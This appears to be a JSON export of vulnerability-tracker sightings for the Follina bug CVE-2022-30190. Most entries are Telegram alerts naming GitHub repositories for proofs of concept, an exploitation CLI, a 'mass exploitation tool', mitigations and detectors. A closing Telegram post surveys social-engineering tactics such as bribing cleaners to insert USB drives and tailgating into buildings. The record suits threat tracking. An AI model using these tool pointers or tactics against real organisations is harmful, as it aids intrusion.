"vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2363", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of Concept zu MSDT-Follina - CVE-2022-30190. \u00dcBERPR\u00dcFUNG DER WIRKSAMKEIT VON MICROSOFT DEFNEDER IN DER JEWEILS AKTUELLSTEN WINDOWS 10 VERSION.\nURL\uff1ahttps://github.com/ImproveCybersecurityJaro/2022_PoC-MSDT-Follina-CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T23:12:47.000000Z"}, {"uuid": "3693d8ab-153c-4bdd-943f-421f8a9e27cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2378", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 | MS-MSDT Follina One Click\nURL\uff1ahttps://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T22:59:39.000000Z"}, {"uuid": "777a2422-e630-4f06-ab73-1f54158253ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2377", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aPDQ Package I created for CVE-2022-30190\nURL\uff1ahttps://github.com/castlesmadeofsand/ms-msdt-vulnerability-pdq-package\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T15:37:01.000000Z"}, {"uuid": "7a6aa9f4-44b4-455b-af1c-23f6185c85e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2329", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190- A Zero-Click RCE Vulnerability In MSDT\nURL\uff1ahttps://github.com/kdk2933/msdt-follina-office\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T17:59:12.000000Z"}, {"uuid": "0e695757-b03a-4943-9044-5862004d13ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2328", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aPicking up processes that have triggered ASR related to CVE-2022-30190\nURL\uff1ahttps://github.com/DOV3Y/CVE-2022-30190-ASR-Senintel-Process-Pickup\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T16:14:34.000000Z"}, {"uuid": "b87861ad-3fa5-412a-a66d-725cafa51f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2474", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aRepository containing the compromised certificate seen in recent CVE-2022-30190 (Follina) attacks.\nURL\uff1ahttps://github.com/b401/Clickstudio-compromised-certificate\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-09T10:07:52.000000Z"}, {"uuid": "29293b38-533b-4ed8-b5c3-7b01c3374508", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2497", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina \nURL\uff1ahttps://github.com/safakTamsesCS/PicusSecurity4.Week.Repo\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-12T20:51:23.000000Z"}, {"uuid": "2dbcae90-089f-4424-aa91-06f0d0e1d3bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2492", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aproof of concept to CVE-2022-30190 (follina)\nURL\uff1ahttps://github.com/AmitNiz/follina_cve_2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-11T15:52:13.000000Z"}, {"uuid": "5866d95c-5477-4613-9628-43aa0dc4028d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2600", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 powerpoint version\nURL\uff1ahttps://github.com/Gra3s/CVE-2022-30190-Follina-PowerPoint-Version\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-29T09:15:48.000000Z"}, {"uuid": "c1822157-6881-466e-9c6c-e68aa33e81b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2751", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aDetection and Remdiation of  the Follina MSDT Vulnerability (CVE-2022-30190)\nURL\uff1ahttps://github.com/EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190-\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-07-21T07:26:21.000000Z"}, {"uuid": "9ab94737-5845-43b1-a5c3-78c08734e73d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2325", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190  Follina POC\nURL\uff1ahttps://github.com/onecloudemoji/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T06:51:55.000000Z"}, {"uuid": "78020955-bba2-478d-8d8d-b1e0517247f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2853", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA Fullstack Academy Cybersecurity project examining the full cycle of the Follina (CVE-2022-30190) vulnerability, from exploit to detection and defense.\nURL\uff1ahttps://github.com/jeffymcjeffface/five-nights-at-follina-s\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-08-05T02:37:51.000000Z"}, {"uuid": "a58c4790-0744-4ca5-9b6d-13ab98ae1cbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2355", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aAn NSIS script that helps deploy and roll back the mitigation registry patch for CVE-2022-30190 as recommended by Microsoft\nURL\uff1ahttps://github.com/rouben/CVE-2022-30190-NSIS\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T19:05:58.000000Z"}, {"uuid": "38d9e479-dea2-4c0a-bb43-b8a8d2094309", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2343", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 Zero click rce Mass Exploitation Tool with Multi threading capabilities\nURL\uff1ahttps://github.com/Kesinger57/CVE-2022-30190-mass\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T09:38:46.000000Z"}, {"uuid": "17447392-e9ce-4883-bfc5-1ae66287c7e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2342", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aFollina MS-MSDT 0-day MS Office RCE (CVE-2022-30190) PoC in Go\nURL\uff1ahttps://github.com/dwisiswant0/gollina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T09:28:12.000000Z"}, {"uuid": "990233c4-fb7c-4d0c-bd8e-9fcb192c361f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2456", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft Support Diagnostic Tool (CVE-2022-30190)\nURL\uff1ahttps://github.com/joshuavanderpoll/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-07T10:21:21.000000Z"}, {"uuid": "e221e627-9788-4948-836e-13df4592ff95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2473", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aExploit Microsoft Zero-Day Vulnerability Follina (CVE-2022-30190)\nURL\uff1ahttps://github.com/Hrishikesh7665/Follina_Exploiter_CLI\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-09T09:37:06.000000Z"}, {"uuid": "ff5a96c7-d2fb-4d2c-9546-8aaa81508d3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2337", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 remediation via removal of ms-msdt from Windows registry\nURL\uff1ahttps://github.com/PaddlingCode/cve-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T23:41:30.000000Z"}, {"uuid": "d4ebccbc-d828-4181-9675-523d35525bee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3240", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aImplementation of CVE-2022-30190 in C\nURL\uff1ahttps://github.com/mattjmillner/CVE-Smackdown\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-10T18:21:26.000000Z"}, {"uuid": "3a804d2b-9449-46de-b35f-68e7548527d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2521", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThese are the source codes of the Python scripts to apply the temporary protection against the CVE-2022-30190 vulnerability (Follina)\nURL\uff1ahttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-16T20:50:32.000000Z"}, {"uuid": "554f8051-ef5e-4260-a0e1-80169679bd64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2361", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 or \\\"Follina\\\" 0day proof of concept\nURL\uff1ahttps://github.com/rayorole/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T21:45:46.000000Z"}, {"uuid": "310c0377-88db-45db-a305-bb73619bf7db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2468", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of Concept of CVE-2022-30190\nURL\uff1ahttps://github.com/Malwareman007/Deathnote\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-08T11:03:22.000000Z"}, {"uuid": "06ac6a55-762d-4a85-ba2f-dd7045964374", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/GithubRedTeam/2506", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1awriteup and poc for [CVE-2022-26809]  CVE-2022-26809 Vulnerabillity in cre windows componen(RPC) with a high cvss score of 9.8\nURL\uff1ahttps://github.com/SonicWave21/Follina-CVE-2022-30190-Unofficial-patch\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-14T13:03:21.000000Z"}, {"uuid": "0474f625-dc6c-4e2d-ab25-1024f804fafb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2520", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThese are two Python scripts compiled to easily and quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina)\nURL\uff1ahttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-16T20:34:54.000000Z"}, {"uuid": "48b5e66e-9c6b-4691-a7c0-85530ce8cdbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2358", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aRemoves the ability for MSDT to run, in response to CVE-2022-30190 (Follina)\nURL\uff1ahttps://github.com/Cosmo121/Follina-Remediation\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T20:38:18.000000Z"}, {"uuid": "ccb6b845-9eba-4d09-9a7a-7a66c523b3aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2369", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA tool written in Go that scans files & directories for the Follina exploit (CVE-2022-30190)\nURL\uff1ahttps://github.com/ErrorNoInternet/FollinaScanner\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T06:55:29.000000Z"}, {"uuid": "a9029565-1ebd-4ced-af7f-4383b0a63651", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2367", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMSDT protocol disabler (CVE-2022-30190 patch tool)\nURL\uff1ahttps://github.com/gamingwithevets/msdt-disable\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T02:49:08.000000Z"}, {"uuid": "0ed376fd-6ba1-426b-91e0-ef52c0fe923f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/GithubRedTeam/2390", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft's recommended mitigation for CVE-2022-30190 using Powershell\nURL\uff1ahttps://github.com/hilt86/cve-2022-30190-mitigate\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-03T06:07:30.000000Z"}, {"uuid": "b295642f-ab6b-40a2-9a98-181150426736", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3463", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA Command Line based python tool for exploit Zero-Day vulnerability in MSDT (Microsoft Support Diagnostic Tool) also know as 'Follina' CVE-2022-30190.\nURL\uff1ahttps://github.com/0xAbbarhSF/FollinaXploit\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-23T23:02:20.000000Z"}, {"uuid": "6b0f248c-ef93-4c21-b455-013c26c08b84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/technical_private_cat/191", "content": "Part 1 - social engineering\n\nFirst I want to talk about social engineering. \nWhat is social engineering? \nIt is methods of influencing a person to do what you want him to do. \n\nBut what methods hackers use and what tools and resources do they use? \n\nThe first and most famous type I want to talk about is phishing. \nFor me phishing is divided into two types - mass and targeted (those who knows can correct). \n\"Bulk phishing\" is a kind of mass general delivery of let's say emails with malicious files, links, threat notifications etc. with some kind of general concept.  \n\nAnd directed is phishing, which is aimed at a particular person - for example, deputy director of the company. To do so, phishers first use methods a la OSINT to collect information about a target and then they compose phishing attacks.  \nTo hide an exe in any other format they use different file joyners or work with asm exe files themselves. Then they make up a more or less convincing story or just send it to the victim(s). Another example about sending documents is the infamous CVE-2022-30190, which contains exploits, see.\nWhat does it do?  \nThis vulnerability can be exploited via a malicious MS Office document.\nWhen something goes wrong with Windows it can invoke from other applications via a special MSDT URL protocol. \nIf the vulnerability is exploited successfully, the attacker can run arbitrary code with the privileges of the application that invoked MSDT, i.e. in our case with the privileges of the user who opened the malicious file.\nSimilar vulnerability and exploit \n\nPhishing can also be done via fake websites. \nThis is also very easy to do. \nThere are phishing attempts when a hacker is already in the local network and needs to get passwords to log on to the server and download the malware. For this, most often a local attack using local dos attacks for example with pyersinia to the victim device is restarted, and the attacker could intercept the data entered. \nHere is a wireshark article about data hijacking \n\nNow let's talk about the social engineering, where the intruder must be \"present\".\nThe first thing that comes to mind is the compromise of the employees.  As they say \"the most vulnerable part of the server is the cleaner\" - Because she does not know anything about computers, the intruder can pay her and ask to insert a flash drive\ud83e\udda0 Or remember how lapsus did (asking directly the companies employees to cooperate with them) . \nEven if no one from the failed to compromise or hack, the attacker has to act himself. For such a hacker can pretend to be an employee of the company, or I've seen somewhere that they dig in the office trash (nothing funny someone throws out passwords there), even for example, to get into the company building, they can just confidently go after someone else.\nIn general, if more stringent on the security of places, there they are more likely to compromise employees or conduct other manipulations with them ...\nA little touch on how to deal with it.\nFirst of all be more vigilant, do not open any e-mails from unknown addresses, do not click on links, more often check the network in the company for suspicious actions, and in general be more vigilant to everything.  Concerning the second type: how to avoid compromise, well this is a very difficult question - probably check the employees more often. In general the topic of social engineering is quite vast and affects many areas of life, BUT I think you understood in brief. If anything, I'll attach a few articles about social engineering methods below. \nAnd then you can move on to the next part.\n #virus #social_engineering", "creation_timestamp": "2022-09-24T08:33:34.000000Z"}, {"uuid": "3a110461-749a-4367-9669-e2e68114e013", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3636", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of concept for CVE-2022-30190 (Follina).\nURL\uff1ahttps://github.com/winstxnhdw/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-12-26T21:47:18.000000Z"}, {"uuid": "efb22454-fee1-4393-af05-f3719c92830c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/technical_private_cat/184", "content": "\u0427\u0430\u0441\u0442\u044c 1 - \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u044f\n\n\u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u0445\u043e\u0447\u0443 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u043f\u0440\u043e \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u044e. \n\u0427\u0442\u043e \u0442\u0430\u043a\u043e\u0435 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u044f  ? \n\u042d\u0442\u043e \u043c\u0435\u0442\u043e\u0434\u044b \u0432\u043b\u0438\u044f\u043d\u0438\u044f \u043d\u0430 \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430 \u0447\u0442\u043e\u0431\u044b \u043e\u043d \u0441\u0434\u0435\u043b\u0430\u043b \u0442\u043e \u0447\u0442\u043e \u0431\u044b \u0445\u043e\u0447\u0435\u0448\u044c. \n\n\u041d\u043e \u043a\u0430\u043a\u0438\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0445\u0430\u043a\u0435\u0440\u044b \u0438 \u043a\u0430\u043a\u0438\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0438 \u0440\u0435\u0441\u0443\u0440\u0441\u044b \u043a \u043d\u0438\u043c \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442 ? \n\n\u041f\u0435\u0440\u0432\u044b\u0439 \u0438 \u0441\u0430\u043c\u044b\u0439 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0432\u0438\u0434 \u043e \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u044f \u0445\u043e\u0447\u0443 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u044d\u0442\u043e \u0444\u0438\u0448\u0438\u043d\u0433. \n\u0414\u043b\u044f \u043c\u0435\u043d\u044f \u0444\u0438\u0448\u0438\u043d\u0433 \u0434\u0435\u043b\u0438\u0442\u044c\u0441\u044f \u043d\u0430 \u0434\u0432\u0430 \u0432\u0438\u0434\u0430 - \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0439 \u0438 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 (\u043a\u0442\u043e \u0448\u0430\u0440\u0438\u0442 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043f\u0440\u0430\u0432\u0438\u0442\u044c) . \n\"\u041c\u0430\u0441\u0441\u043e\u0432\u044b\u0439 \u0432\u0438\u0434\" \u044d\u0442\u043e \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0435 \u043e\u0431\u0449\u0438\u0435 \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0438 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c \u043f\u0438\u0441\u0435\u043c \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u0444\u0430\u0439\u043b\u0430\u043c\u0438 ,\u0441\u0441\u044b\u043b\u043a\u0430\u043c\u0438, \u0443\u0432\u0435\u0434\u043e\u043c\u043b\u0435\u043d\u0438\u044f\u043c\u0438 \u043e\u0431 \u0443\u0433\u0440\u043e\u0437\u0430\u0445 \u0438 \u0442\u0434 \u0441 \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u043e\u0431\u0449\u0435\u0439 \u043a\u043e\u043d\u0446\u0435\u043f\u0446\u0438\u0435\u0439.  \n\u0410 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u044d\u0442\u043e \u0444\u0438\u0448\u0438\u043d\u0433 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430\u0446\u0435\u043b\u0435\u043d \u043d\u0430 